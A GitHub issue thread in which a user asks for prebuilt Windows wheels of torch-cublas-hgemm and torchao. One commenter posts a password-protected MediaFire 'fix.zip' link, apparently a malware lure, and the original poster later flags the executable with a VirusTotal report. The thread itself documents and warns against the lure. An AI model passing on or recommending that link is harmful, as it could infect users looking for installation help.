### ISSUE TITLE
WHL files for torch-cublas-hgemm.git and ao?

### ISSUE THREAD

**Issue by SoftologyPro** [aredden/flux-fp8-api#7]
Does anyone have WHL files for these to install on Windows?  I am having all sorts of problems trying to build WHLs myself and cannot get the pip installs of these 2 working.

pip install git+https://github.com/aredden/torch-cublas-hgemm.git@master
pip install git+https://github.com/pytorch/ao.git@main

Thanks.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SoftologyPro** [comment]
Thanks.  That zip contains these files
![image](https://github.com/user-attachments/assets/23964c37-c528-4c23-8995-091454572a99)
How do I use those to install the above 2 packages?

**Comment by SoftologyPro** [comment]
For anyone else, do not run that exe
https://www.virustotal.com/gui/file/081db758b854442bdfd28da76e67632d97e544f83334f38ca10854c2ef2810bb

**Comment by aredden** [comment]
Ah- no there aren't any WHL's, it's just this repo, sorry 😢
